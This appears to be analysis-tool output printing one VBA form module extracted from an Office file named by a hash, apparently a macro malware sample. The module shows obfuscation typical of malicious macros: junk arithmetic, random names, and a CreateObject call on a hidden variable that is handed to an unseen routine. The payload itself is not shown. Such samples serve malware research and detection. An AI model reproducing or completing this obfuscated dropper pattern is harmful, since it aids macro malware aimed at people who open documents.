Filename     : ./macros/5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
OLE stream   : Macros/VBA/gogoose1
VBA filename : gogoose1.frm
----------------------------------------
Attribute VB_Name = "gogoose1"
Attribute VB_Base = "0{670A9C96-3725-4E91-927B-16DE845BF7AD}{963F7386-08BC-4F8B-9B93-B2CCD9E06B49}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub cancerfrog_Change()

End Sub

Private Sub gogueacr_Change()

End Sub

Private Sub signtist_Change()

End Sub

Private Sub tralcodg_Change()
Set bustmust = CreateObject(accessruy)
ficken10 = 71 + 73
ficken10 = 47 - 9 + 7
ficken10 = 20 - 42 - 46 * ficken10
ficken10 = ficken10 - ficken10 + ficken10
ficken10 = 27 + ficken10 - 8
foxwillie bustmust
End Sub

Private Sub waulniba_Change()

End Sub

Private Sub xaza1111_Change()

End Sub
